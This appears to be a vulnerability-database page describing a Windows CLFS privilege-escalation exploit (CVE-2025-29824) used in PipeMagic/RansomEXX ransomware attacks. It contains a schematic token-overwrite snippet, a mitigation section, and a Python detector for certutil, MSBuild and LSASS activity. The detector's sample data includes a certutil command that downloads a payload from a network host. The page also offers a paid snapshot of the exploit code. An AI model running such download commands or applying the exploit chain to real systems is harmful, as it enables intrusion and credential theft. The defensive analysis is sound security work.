Associated Vulnerability
Description
Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.
Introduction
🚨 CVE-2025-29824 Exploit: PipeMagic Ransomware Chain
📌 Critical Vulnerability Overview
<span style="color: #ff5555; font-weight: bold">Privilege Escalation Flaw in Windows CLFS</span> → SYSTEM Privilege Hijack
Exploited in Active Ransomware Attacks by <span style="background-color: #222222; color: #ff9966; padding: 2px 6px">Storm-2460 Threat Group</span>
🖥️ Affected Systems
🧩 Exploit Chain Workflow
```mermaid
graph LR
A[Initial Access] -->|certutil| B[Malicious MSBuild Payload]
B --> C[PipeMagic Trojan]
C -->|CVE-2025-29824| D[CLFS Kernel Exploit]
D -->|RtlSetAllBits| E[Token Overwrite 0xFFFFFFFF]
E --> F[SYSTEM Privileges]
F --> G[LSASS Dumping]
G --> H[Ransomware Deployment]
```
1. Initial Access
<small style="color: #aaaaaa">Initial vector unknown; <code>certutil</code> was used to download the malicious MSBuild file from a compromised legitimate site</small>
2. PipeMagic Loader
<small style="color: #aaaaaa">Modular trojan (active since 2022)</small>
3. Kernel Exploit
```c
// Schematic of the exploit's core logic; not the full exploit.cpp.
// CLFS_Trigger_Corruption() is a placeholder for the use-after-free
// trigger in the CLFS driver (CVE-2025-29824), not a real API.
CLFS_Trigger_Corruption();

// RtlSetAllBits(PRTL_BITMAP) sets every bit of a bitmap to 1. The exploit
// points such a bitmap at its own process token, so the token's privilege
// fields are overwritten with 0xFFFFFFFF and every privilege is enabled.
// 0xFFFFFFFF is the resulting value, not a parameter of RtlSetAllBits.
RtlSetAllBits(exploit_process_token_bitmap);   // token bits -> 0xFFFFFFFF
```
4. Post-Exploitation
• <span style="color: #ff5555">LSASS memory dump</span> → Credential theft
• File encryption with <span style="background-color: #333333; color: #55ffff; padding: 2px 4px">.random_extension</span>
• <span style="color: #ff55ff">RansomEXX</span> TOR note deployment
🌩️ Attack Attribution & History
| CVE | Year | Ransomware | Chain |
|---|---|---|---|
| CVE-2023-28252 | 2023 | Nokoyawa | PipeMagic → CLFS |
| CVE-2025-24983 | 2025 | Unknown | PipeMagic → Win32K |
| <span style="color: #ffff55">CVE-2025-29824</span> | 2025 | <span style="color: #ff55ff">RansomEXX</span> | PipeMagic → CLFS |
Targeted Industries:
🏢 US IT/Real Estate • 🇻🇪 Venezuela Finance • 🇪🇸 Spanish Software • 🇸🇦 Saudi Retail
🛡️ Mitigation Requirements
```diff
+ Patch Applied: MS April 2025 Patch Tuesday
! Detection Priority: certutil download -> MSBuild execution -> LSASS access
- Hunt Pattern: post-exploit token manipulation (all privilege bits set via RtlSetAllBits)
```
Win11 24H2 not affected by the observed exploit:
The vulnerable code is present and still patched, but the exploit's kernel address leak relies on System Information Classes of NtQuerySystemInformation that 24H2 restricts to callers holding SeDebugPrivilege (normally admin-level users only), so the chain fails from a standard user.
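The three observable stages of the chain (certutil as downloader, MSBuild launched on the downloaded file, a non-system process reading LSASS memory) can be hunted in process telemetry. The following is an added example written for this page; it is not code from the original README or the exploit repository. Event fields follow Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess); the sample events, paths, IP address and the LSASS allow-list are constructed for illustration and are not indicators from the incident.

```python
"""Detection logic for the PipeMagic chain, run over constructed process events."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:            # Sysmon EID 1 subset
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str


@dataclass(frozen=True)
class AccessEvent:          # Sysmon EID 10 subset
    source_image: str
    target_image: str
    granted_access: int     # access mask granted on the target process


# certutil used as a downloader: the -urlcache switch or a URL on the command line
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache|\bhttps?://", re.IGNORECASE)
PROCESS_VM_READ = 0x0010    # the right a memory dumper needs on lsass.exe
# Constructed allow-list of processes that legitimately read lsass.exe; tune per
# environment (e.g. add the EDR/AV engine).
LSASS_ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_certutil_downloads(events):
    """(event, written_path) for each certutil invocation that fetches a URL.
    For 'certutil -urlcache -f <url> <file>' the last token is the output file."""
    hits = []
    for ev in events:
        if _base(ev.image) == "certutil.exe" and CERTUTIL_DOWNLOAD.search(ev.cmdline):
            hits.append((ev, ev.cmdline.split()[-1].lower()))
    return hits


def find_msbuild_of_downloaded(events, downloads):
    """MSBuild.exe launched on a project file that certutil just wrote."""
    paths = {p for _, p in downloads}
    return [ev for ev in events
            if _base(ev.image) == "msbuild.exe"
            and any(p in ev.cmdline.lower() for p in paths)]


def find_lsass_access(access_events):
    """Non-allow-listed processes opening lsass.exe with PROCESS_VM_READ."""
    return [ev for ev in access_events
            if _base(ev.target_image) == "lsass.exe"
            and ev.granted_access & PROCESS_VM_READ
            and ev.source_image.lower() not in LSASS_ALLOWED_SOURCES]


def analyze(proc_events, access_events):
    """Count hits per stage; a host showing all three matches the full chain."""
    downloads = find_certutil_downloads(proc_events)
    return {
        "certutil_download": len(downloads),
        "msbuild_from_download": len(find_msbuild_of_downloaded(proc_events, downloads)),
        "lsass_access": len(find_lsass_access(access_events)),
    }


# Constructed sample telemetry (not real logs).
SAMPLE_PROCS = [
    ProcEvent(3300, 1200, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\jdoe"),
    # benign certutil use: hashing a file, no URL -> not flagged
    ProcEvent(4100, 3300, r"C:\Windows\System32\certutil.exe",
              r"certutil -hashfile C:\Tools\setup.exe SHA256", r"CORP\jdoe"),
    # stage 1: certutil as downloader
    ProcEvent(4120, 3300, r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -f http://203.0.113.10/update.msbuild C:\Users\Public\update.msbuild",
              r"CORP\jdoe"),
    # stage 2: MSBuild executes the downloaded project file
    ProcEvent(4180, 3300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\Public\update.msbuild", r"CORP\jdoe"),
    # benign developer build -> not flagged
    ProcEvent(4200, 3300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build", r"CORP\jdoe"),
]

SAMPLE_ACCESS = [
    AccessEvent(r"C:\Windows\System32\csrss.exe", r"C:\Windows\System32\lsass.exe", 0x1410),
    # stage 3: unknown binary in a user-writable path reads LSASS memory
    AccessEvent(r"C:\Users\Public\dllhost.exe", r"C:\Windows\System32\lsass.exe", 0x1FFFFF),
]

if __name__ == "__main__":
    print(analyze(SAMPLE_PROCS, SAMPLE_ACCESS))
```

The certutil-to-MSBuild correlation is done on the written file path rather than on parent/child PIDs, because the page's chain shows the MSBuild payload being fetched first and executed later; a `certutil -urlcache -split -f <url>` without an explicit output file would record the URL as the "path", which still surfaces the download but will not correlate to the MSBuild stage.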
⚠️ Legal & Ethical Warning
This exploit is published FOR RESEARCH PURPOSES ONLY.
Active ransomware deployment confirmed in:
<div style="border-left: 3px solid #ff5555; padding-left: 10px">
"Attacks on IT/real estate (US), finance (Venezuela),<br>
software (Spain), retail (Saudi Arabia)"
</div>
https://thehackernews.com/2025/04/pipemagic-trojan-exploits-windows-zero.html
![RISK: CRITICAL](https://img.shields.io/badge/RISK-CRITICAL-red)
![PATCHED: April 2025](https://img.shields.io/badge/PATCHED-April_2025-green)
![SCOPE: Win7→Server 2025](https://img.shields.io/badge/SCOPE-Win7→Server_2025-orange)
File Snapshot
[4.0K] /data/pocs/8910ce4749e94598d02a9110573b865157d960fc
├── [1.0K] cve-2025-29824.sln
├── [4.9K] cve-2025-29824.vcxproj
├── [ 168] cve-2025-29824.vcxproj.user
├── [4.5K] exploit.cpp
├── [2.6K] README.md
└── [ 526] shellcode.asm
0 directories, 6 files
Notes
1. Accessing the code via the original source is recommended.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 (Shenlong) has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.